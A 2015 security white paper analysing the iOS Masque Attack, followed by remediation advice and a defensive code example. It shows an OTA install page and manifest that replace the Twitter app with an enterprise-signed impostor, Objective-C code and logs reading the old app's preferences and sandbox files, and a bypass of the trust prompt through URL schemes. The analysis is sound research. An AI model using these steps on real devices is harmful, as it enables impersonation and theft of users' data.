Project: White Paper – Masque Attack
Authors: Giorgio Fedon, Simone Bovi
Edition: 1.0
Date: 03-03-2015
White Paper: Masque Attack
Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 1
Table of contents
1 Introduction ... 2
1.1 White Paper Objectives ... 2
1.2 Masque Attack Introduction ... 2
1.2.1 Threat scenarios of the Masque Attack ... 4
2 Attack executions and results of the analysis ... 5
2.1 Environment Setup ... 5
2.2 Attack execution ... 6
2.3 Results: Files accessible by the new app ... 10
2.3.1 Preferences File ... 10
2.3.2 Keychain access ... 11
2.3.3 Access to the bundle's files ... 12
2.3.4 Access to the files in the sandbox ... 13
2.4 Masque Attack via URL Schemes ... 15
3 Remediation ... 17
1 Introduction
1.1 White Paper Objectives
The objectives of this white paper are to analyze the impacts and mitigations of the Masque Attack against a non-jailbroken iOS Apple device.
This paper opens with an introductory section whose purpose is to illustrate this kind of attack in general terms and to explore all its implications.
The second section deals with the setup used to perpetrate the attack and the set of tests executed to verify which files belonging to the attacked application were accessible by the new one.
The third and last section shows the conclusions of the paper, the key results obtained and a list of possible remediations.
1.2 Masque Attack Introduction
In July 2014, the security company FireEye, together with the security researchers Stefan Esser and Jonathan Zdziarski, discovered[1] that an iOS app installed using enterprise/ad-hoc provisioning could replace another, genuine app previously installed through the App Store, as long as both apps used the same bundle identifier.
This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier.
The malicious app could be downloaded and installed by a user via social engineering: once that is done, the new app overwrites the old one already installed on the device.
An exception is represented by the iOS preinstalled apps: they can't be substituted.
It is important to note that this attack puts iOS users at a greater risk than their Android counterparts. Android offers an option that disallows installing applications from sources other than the Play Store, while on iOS this choice is not available.
The following picture shows the Masque Attack flow:
The following picture shows the Masque Attack flow:
[1] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Besides the application impersonation effect, the malicious app will be able to steal all data saved in the directories shared with the original app (i.e. Local Data Cache, Preferences file, etc.).
On the other hand, Keychain entries and the pre-attack bundle's files seem to remain safely protected from unauthorized read.
More analysis on that will be provided in section 2 of this paper.
Furthermore, it has been found that the trust alert prompted at the first launch of an enterprise-signed app can be easily bypassed by exploiting the current URL Schemes implementation.
iOS versions 7.x and 8.x (< 8.1.3) are affected by this issue on both jailbroken and non-jailbroken devices.
Furthermore, the Masque Attack via URL Scheme Hijacking vulnerability has not yet been fixed. This will be explained in detail in section 2.4.
1.2.1 Threat scenarios of the Masque Attack
These are the main threat scenarios of this kind of attack:
- Non-jailbroken iOS Apple devices are threatened too;
- A user may not be aware of having a malicious app on his device, because it replaces one that was regularly installed;
- The malicious app can read all the unencrypted data stored by the previous app, except the Keychain, and send it to the attackers' servers;
- The malicious app can mount a phishing attack mimicking the original app's UI and steal the related credentials;
- The malicious app can be launched despite the alert prompt shown when launching enterprise-signed apps for the first time;
- The malicious app can hijack the URL Schemes of a legitimate popular app in order to perform phishing attacks to steal credentials or gather data intended to be shared between two trusted apps.
2 Attack Executions and Results of the Analysis
2.1 Environment Setup
An enterprise provisioning profile matched with a developer certificate was used to perpetrate the attack: the public key inside the first file corresponds to the private key of the certificate installed on the host where the app is compiled.
The app is installed on the device via OTA, using a local HTTPS web server.
It has to be noted that developer certificates and mobile enterprise provisioning files can be easily found on the Internet through ad-hoc Google dorks.
Following is a screenshot of a website where these files can be located:
For the signing part of the created IPA, the iReSign tool was used (https://github.com/maciekish/iReSign):
As we can see, the IPA can be signed with a smuggled developer certificate.
2.2 Attack execution
The app used as an example for the attack is Twitter, downloadable from the App Store at the time of writing.
Bundle Identifier of the Twitter app: com.atebits.Tweetie2.
The following picture shows the Springboard of the test device before the attack:
As can be seen, the Twitter app downloaded from the App Store is regularly installed.
Connecting to the URL where the web server used for the OTA installation is located, the following screen is shown:
This was created using the following HTML code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>Sample iOS OTA install</title>
</head>
<body>
  <!-- itms-services: link pointing iOS at the OTA manifest; the ampersand is escaped as XHTML requires -->
  <a href="itms-services://?action=download-manifest&amp;url=https://www.mindedsecurity.com/manifest.plist"><font size="+4">Install the App</font></a>
</body>
</html>
Clicking on "Install the App", iOS fetches the manifest.plist file hosted on the web server, which has the following contents:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>items</key>
  <array>
    <dict>
      <key>assets</key>
      <array>
        <dict>
          <key>kind</key>
          <string>software-package</string>
          <key>url</key>
          <string>https://www.mindedsecurity.com/twitter.ipa</string>
        </dict>
      </array>
      <key>metadata</key>
      <dict>
        <key>bundle-identifier</key>
        <string>com.atebits.Tweetie2</string>
        <key>bundle-version</key>
        <string>1.0</string>
        <key>kind</key>
        <string>software</string>
        <key>title</key>
        <string>Twitter</string>
      </dict>
    </dict>
  </array>
</dict>
</plist>
iOS then asks to confirm the download. The application name shown is the value of the key "title" inside the manifest.plist:
Clicking on "Install", the app's installation starts on the device, as shown by the following screenshots:
The application presents a different Display Name and the default icon in order to make the substitution clear, but it would be possible to use the original icon and name of the real Twitter application.
2.3 Results: Files accessible by the new app
At this point it is very interesting to verify which files are accessible by the new application.
Clearly, the new application is not able to access files outside its sandbox, but it could be able to access files left behind by the previous installation.
Below, all the tests performed are listed, together with the code used and the related log output.
2.3.1 Preferences File
Each application saves its settings inside a file in the sandbox at the Library/Preferences path. This file is automatically created at the application's first launch.
The following code was used to verify whether the new app can access the preferences file created by the previous application:
NSUserDefaults *prefs = [NSUserDefaults standardUserDefaults];
NSString *value1 = [prefs stringForKey:@"TCCardRuntimePlatform"];
NSLog(@"Value of the key TCCardRuntimePlatform in the Preferences file: %@", value1);
NSString *value2 = [prefs stringForKey:@"appVersion"];
NSLog(@"Value of the key appVersion in the Preferences file: %@", value2);
NSString *value3 = [prefs stringForKey:@"previousApplicationVersion"];
NSLog(@"Value of the key previousApplicationVersion in the Preferences file: %@", value3);
From the application log it is possible to see that all the values are correctly read:
Twitter[1708] <Warning>: Value of the key TCCardRuntimePlatform in Preferences file: iPhone-12
Twitter[1708] <Warning>: Value of the key appVersion in Preferences file: 6.21.1
Twitter[1708] <Warning>: Value of the key previousApplicationVersion in Preferences file: 6.21.1
So, the Preferences file created by the substituted application is perfectly readable by the new application.
2.3.2 Keychain access
The Keychain is an encrypted SQLite database where it is advisable to store sensitive application data such as passwords.
By default the iOS sandbox is also enforced for the Keychain: an app can access only its own Keychain entries.
The following code was used to verify whether the new app can access the Keychain entries of the previous application (using the PDKeychainBindingsController library available at https://github.com/carlbrown/PDKeychainBindingsController):
NSLog(@"Trying to read the Keychain");
PDKeychainBindings *bindings = [PDKeychainBindings sharedKeychainBindings];
NSString *value = [bindings stringForKey:@"passwordString"];
NSLog(@"%@", value);
From the application log it is possible to see that trying to read an arbitrary Keychain entry produces the following error:
Twitter[1708] <Warning>: Trying to read the Keychain
securityd[1245] <Error>: securityd_xpc_dictionary_handler Twitter[1708] copy_matching The operation couldn’t be completed. (OSStatus error -34018 - client has neither application-identifier nor keychain-access-groups entitlements)
Twitter[1708] <Error>: SecOSStatusWith error:[-34018] The operation couldn’t be completed. (OSStatus error -34018 - Remote error : The operation couldn’t be completed. (OSStatus error -34018 - client has neither application-identifier nor keychain-access-groups entitlements))
Twitter[1708] <Warning>: (null)
The reason behind the error lies in the mechanism by which single Keychain entries can be accessed from different applications.
For the purpose of sharing Keychain entries, Apple provides Keychain Access Groups: each app that belongs to a group can read all the Keychain entries associated with that group, while apps that do not belong to it are forbidden from accessing them.
Access control to shared items is enforced through App ID prefixes (Team ID) and provisioning profiles. It is not possible to access a Keychain Access Group without using a provisioning profile containing the AppID prefix of the app whose Keychain one wants to access. However, Apple does not allow a developer to use an AppID equal to another developer's.
So the only way to access the Keychain entries of the old application lies in the generation of a provisioning file with an AppID containing the same prefix used by the previous application. This is impossible in general, but in October 2014 Erik Romijn found a vulnerability in the Apple portal that allowed a developer to insert an arbitrary value as the AppID, permitting him to read the Keychain entries of the app with the same prefix. The vulnerability is now fixed, but it can't be excluded that fake provisioning profiles will still be used until October 2015, because they expire one year after their creation.
More information about this vulnerability can be found at this link: http://erik.io/blog/2014/10/10/vulnerability-apple-portal-compromised-keychain-access-groups/
2.3.3 Access to the bundle's files
This check was done to make sure that the old files in the bundle were completely replaced by the new ones.
The following code was used to verify the version of the new bundle as stored in its Info.plist file:
NSString *appVersion = [[NSBundle mainBundle] objectForInfoDictionaryKey:@"CFBundleVersion"];
NSLog(@"Bundle App version in Info.plist file: %@", appVersion);
As can be seen from the following log, the bundle version displayed is 1 (the value set by Minded Security in the Xcode project for the new app), while the original version at the time of writing was 6.21.1:
Twitter[1708] <Warning>: Bundle App version in Info.plist file: 1
Another test was done to check that files belonging to the old bundle, and surely not present in the new one, had disappeared.
As an example, searching for the file favorite.vector available in the previous application's bundle:
NSString *filePath = [[NSBundle mainBundle] pathForResource:@"favorite" ofType:@"vector"];
// pathForResource:ofType: returns nil when the resource is not in the current bundle
NSString *myText = nil;
if (filePath) {
    myText = [NSString stringWithContentsOfFile:filePath encoding:NSUTF8StringEncoding error:NULL];
}
if (myText) {
    NSLog(@"favorite.vector exists");
}
NSLog(@"favorite.vector file contents: %@", myText);
The following log is obtained:
Twitter[1708]: (null)
The bundle of the application, as expected, is completely overwritten by that of the new one, without leaving any old files.
2.3.4 Access to the files in the sandbox
The last test was dedicated to checking which files in the sandbox could be accessed by the new application.
In particular, the code used to read the content of the Documents folder is presented next. This directory is where an application writes the data it generates at runtime and wants to persist between runs. Moreover, it is backed up when the device is synchronized with iTunes or iCloud.
NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
NSLog(@"Document folder path: %@", paths);
NSString *documentsDirectory = [paths objectAtIndex:0];
NSError *error = nil;
NSArray *directoryContents = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:documentsDirectory error:&error];
NSLog(@"Document folder contents: %@", directoryContents);
The following log shows that it is possible to list and access all the files belonging to the Documents folder of the old app:
Twitter[1708] <Warning>: Documents folder contents: (
"com.atebits.tweetie.application-important-state",
"com.atebits.tweetie.application-state",
"com.atebits.tweetie.authorizationmanager",
"com.atebits.tweetie.authorizationmanagerTFNAuthorizationManagerData.data",
"com.atebits.tweetie.authorizationmanagerTFNAuthorizationManagerRequestCounts.data",
"com.atebits.tweetie.configuration",
"com.atebits.tweetie.sentinel"
)
It is also possible to access the folder where cache files are stored, the Library/Caches folder, using the following code:
NSString *cachesPath = [NSSearchPathForDirectoriesInDomains(NSCachesDirectory, NSUserDomainMask, YES) objectAtIndex:0];
NSString *cacheDir = [cachesPath stringByAppendingPathComponent:@"com.atebits.Tweetie2"];
NSError *error = nil;
NSArray *directoryContents = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:cacheDir error:&error];
NSLog(@"Contents of Library/Caches/com.atebits.Tweetie2 folder: %@", directoryContents);
The following log shows the presence of the old cache files (the new app itself does not use any kind of caching):
Twitter[1708] <Warning>: Content of Library/Caches/com.atebits.Tweetie2 folder: (
"Cache.db",
"Cache.db-shm",
"Cache.db-wal"
)
So it is possible to infer that the new application is able to access the files that were in the sandbox of the previously installed app.
2.4 Masque Attack via URL Schemes
On 19 February 2015, FireEye security researchers presented a new kind of Masque Attack exploiting URL Schemes vulnerabilities[2].
On iOS 8, whenever a user launches an enterprise-signed app for the first time, he is asked whether to trust the new signing party, as can be seen from the following screenshot:
If the user clicks on "Don't Trust", the app does not open.
It has been discovered that this precaution is not enough: indeed, it is possible to bypass this alert message by exploiting the current implementation of URL Schemes.
This can be demonstrated using the following setup:
- An Apple device with iOS 8.1.2 installed;
- A widely installed app like, for example, Facebook;
- An enterprise-signed app registering a URL Scheme identical to the one used by the previous app.
So, it is possible to create an enterprise-signed app registering a URL Scheme used by Facebook, fb://, and bypass the alert prompt by calling that URL Scheme to open the malicious app.
Note that, other than Safari, other third-party apps could be using URL Schemes of popular apps, as for the Facebook login.
[2] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
In this way iOS launches the enterprise-signed app registered to handle the URL scheme without prompting for trust, even if the user has always clicked "Don't Trust". It doesn't matter whether the user has launched that enterprise-signed app before.
This can be used to mount phishing attacks and steal credentials when the UI of the original app is mimicked, or to launch the malicious app despite the lack of trust by the user.
This vulnerability has been fixed in iOS 8.1.3.
A very detailed list of all the URL Schemes registered by apps can be found at this link: http://handleopenurl.com.
It is also important to note that there is another type of Masque Attack that can be accomplished via URL Scheme Hijacking.
In fact, according to the iOS Developer Library[3], "If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme".
So, attackers can publish an app directly on the App Store that registers URL Schemes identical to those of legitimate popular apps, with the exception of the ones predefined by Apple. Through this, attackers can reproduce a legitimate app's UI to perform phishing attacks to steal credentials or gather data intended to be shared between two trusted apps.
This vulnerability has not yet been fixed.
[3] https://developer.apple.com/library/ios/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html
3 Remediation
Masque Attack is one of the few attacks also effective on non-jailbroken Apple iOS devices, and so it is a very interesting topic to analyze.
In this paper it was successfully verified that a legitimate application on a device can be overwritten with a malware app that has the same bundle identifier. This app can be installed by the user via OTA using an enterprise provisioning profile (stolen ones are not difficult to find).
The files belonging to the previous application that can be accessed by the new one are the following:
- Preferences file;
- Files in the sandbox (Documents, Library/Preferences, Library/Caches, etc.).
Bundle files are instead completely substituted by the new installation.
Furthermore, access to the Keychain entries related to the previous installation is forbidden, because it is not possible to forge a provisioning file with an arbitrary AppID, except through the vulnerability illustrated in section 2.3.2.
Moreover, it has been discovered that the alert that prompts the user when an enterprise-signed app is launched for the first time can be easily bypassed by leveraging the current implementation of URL Schemes.
Lastly, it is notable that at this time the URL Scheme Hijacking vulnerability explained at the end of section 2.4 has not yet been fixed.
On 27 Jan 2015, Apple released iOS 8.1.3. This update fixes this vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4493); moreover, iOS now also prompts for trust when first opening an enterprise-signed application via URL Schemes, improving code signature validation (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4494).
So, it is advisable to use only Apple devices with iOS >= 8.1.3 in order to be protected from this threat. Note that the URL Scheme Hijacking vulnerability illustrated at the end of section 2.4 has not yet been fixed.
iOS users can protect themselves from Masque Attack by following these 4 steps:
- Update iOS on the device to a version >= 8.1.3, as suggested above. Note that the URL Scheme Hijacking vulnerability illustrated at the end of section 2.4 has not yet been fixed;
- Don't install apps from third-party sources other than Apple's official App Store or the user's own organization;
- Don't click "Install" on a pop-up from a third-party web page;
- When opening an app, if iOS shows an alert with "Untrusted App Developer", click on "Don't Trust" and uninstall the app immediately. Nevertheless, note that this alert can be bypassed as shown in section 2.4 if iOS >= 8.1.3 is not installed.
iOS developers can mitigate the impact of Masque Attack on their apps and users by following (a mix of) these pieces of advice:
- On the app's first launch, check whether the device runs iOS 8.1.3 or later. If this is not the case, alert the users of the possible threat. To do so, check the [UIDevice currentDevice].systemVersion property;
- In the Xcode project, set the Deployment target to 8.2 when it becomes available. Note that in this way only users with an iOS version >= 8.2 will be able to run the application;
- Enforce all the best practices for writing secure iOS code: encrypt all the sandbox files and store sensitive information only in the Keychain, as this is a safe place against this kind of attack;
- Consider using a push notification service in order to check whether an app is still on the device or has been uninstalled. In particular, check the related Feedback Service (https://developer.apple.com/library/ios/documentation/NetworkingInternet/Conceptual/RemoteNotificationsPG/Chapters/CommunicatingWIthAPS.html#//apple_ref/doc/uid/TP40008194-CH101-SW3);
- In a scenario where an attacker could reuse the original binary and only insert a backdoor, a mitigation might be a check at the start of the application that verifies the AppID of the app: if the AppID is not equal to the expected hardcoded one, the app closes. This assumes that the AppID of the malware app is different from the original one and that the check is not bypassed. See the following link for an implementation idea: http://stackoverflow.com/questions/11726672/access-app-identifier-prefix-programmatically
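The following is an added example, not code from the paper, that combines the first and the last developer mitigations above (iOS version check and AppID prefix check) and, along the way, shows the access-group mechanism described in section 2.3.2: the Keychain reports an item's access group as "<Team ID>.<bundle identifier>", which is why an app signed under another team's profile cannot read the original entries. The MS-prefixed function names and the kExpectedAppIDPrefix value are placeholders chosen for this example.

```objc
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <UIKit/UIKit.h>

// Team ID the genuine app is expected to run under (placeholder: take the real
// value from the app's own provisioning profile at build time).
static NSString * const kExpectedAppIDPrefix = @"EXPECTEDTEAMID";
// First iOS release that fixes the trust-prompt bypass described in section 2.4.
static NSString * const kMinimumSafeIOSVersion = @"8.1.3";

// Reads the Keychain access group of a probe item. iOS fills it in as
// "<Team ID>.<bundle identifier>", so the part before the first dot is the AppID
// prefix. Returns nil if the Keychain call fails, e.g. OSStatus -34018 when the
// process has no application-identifier entitlement (the error seen in 2.3.2).
NSString *MSAppIdentifierPrefix(void) {
    NSDictionary *query = @{
        (__bridge id)kSecClass:            (__bridge id)kSecClassGenericPassword,
        (__bridge id)kSecAttrService:      @"appid-prefix-probe",
        (__bridge id)kSecAttrAccount:      @"probe",
        (__bridge id)kSecReturnAttributes: @YES,
    };
    CFTypeRef result = NULL;
    OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &result);
    if (status == errSecItemNotFound) {
        // No probe item yet: add one; the returned attributes include its access group.
        status = SecItemAdd((__bridge CFDictionaryRef)query, &result);
    }
    if (status != errSecSuccess || result == NULL) {
        return nil;
    }
    NSDictionary *attrs = (__bridge_transfer NSDictionary *)result;
    NSString *accessGroup = attrs[(__bridge id)kSecAttrAccessGroup];
    NSRange dot = [accessGroup rangeOfString:@"."];
    return (dot.location == NSNotFound) ? nil : [accessGroup substringToIndex:dot.location];
}

// YES when the running iOS version is at least `minimum`, compared component-wise
// (so "8.10" sorts after "8.2", unlike a plain string comparison).
BOOL MSRunningIOSAtLeast(NSString *minimum) {
    NSString *current = [UIDevice currentDevice].systemVersion;
    return [current compare:minimum options:NSNumericSearch] != NSOrderedAscending;
}

// Startup check combining the two mitigations: refuse to run under a foreign
// Team ID, and warn on iOS versions where the enterprise-app trust prompt can be
// bypassed through URL Schemes. Returns NO when the app should terminate.
BOOL MSPerformStartupIntegrityChecks(void) {
    NSString *prefix = MSAppIdentifierPrefix();
    if (prefix == nil || ![prefix isEqualToString:kExpectedAppIDPrefix]) {
        // Either the Keychain is unreachable (no application-identifier entitlement)
        // or the binary was re-signed under another Team ID: treat both as tampering.
        NSLog(@"AppID prefix mismatch (got %@), refusing to start", prefix);
        return NO;
    }
    if (!MSRunningIOSAtLeast(kMinimumSafeIOSVersion)) {
        NSLog(@"iOS %@ is older than %@: the trust prompt can be bypassed via URL Schemes",
              [UIDevice currentDevice].systemVersion, kMinimumSafeIOSVersion);
        // In a real app, show this warning to the user with an alert here.
    }
    return YES;
}
```

Call MSPerformStartupIntegrityChecks() from application:didFinishLaunchingWithOptions: and exit when it returns NO; as the paper notes, this only helps when the attacker keeps the original binary and cannot patch the check out.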
Glossary

Term: Mobile provisioning
Description: A mobile provisioning profile[4] creates an association between an application and a developer/organization: that is, a link between a developer certificate and an AppID is created (more on the AppID below).
A provisioning profile must be installed on every device intended to run one's own application code.
Each profile contains:
- A set of developer certificates whose public key must match the private key installed in the Keychain of the host on which the application is compiled;
- The UDIDs of the devices on which the application will run. The devices listed inside the provisioning profile can be used for testing only by the users who have a developer certificate inside the profile;
- The AppID;
- The entitlements used. These grant special capabilities or security permissions to the application; among the entitlements are the use of iCloud, push notifications and Keychain access.
One device can contain more than one provisioning profile.
[4] https://developer.apple.com/library/ios/documentation/IDEs/Conceptual/AppStoreDistributionTutorial/CreatingYourTeamProvisioningProfile/CreatingYourTeamProvisioningProfile.html

Term: AppID
Description: The AppID is an important asset of the code-signing process. It specifies which applications are authorized by the profile to be signed and launched. This identifier is a string composed of two parts:
1. The Team ID, provided by Apple and unique for each development team;
2. The bundle identifier of the single application.
The AppID is located inside the provisioning file.
The prefix of the AppID, which is the Team ID, is very important from a security perspective: apps with the same prefix share their application data, leaping over classic iOS sandbox boundaries.
The same concept is valid for the Keychain entries: apps with the same prefix share access to all their entries.
As a rule, Apple guarantees that different apps from the same developer can have the same prefix, but different apps from different developers cannot.

Term: Bundle Identifier
Description: The Bundle Identifier is the unique string that precisely identifies a single application.
It is typically composed of two parts:
1. One related to the company identifier;
2. One related to the product name entered when setting up the Xcode project.
Moreover, this is also the identifier used when an app update is needed: when a user installs an application with the same bundle identifier as one already present on the device, iOS knows that the latter has to be updated by substituting its bundle with the new one.

Term: Display Name
Description: The Display Name is the identifier that iOS uses to show the app's name on the Springboard.

Term: Google Dorks
Description: Google hacking[5] involves the use of advanced operators in the Google search engine to locate specific strings of text within search results. It means that it is possible to leverage operators provided by Google to narrow the search results. Generally these operators are called Google Dorks.
[5] Johnny Long, Google Hacking for Penetration Testers, Syngress Publishing, 2004. ISBN 1-931836-36-1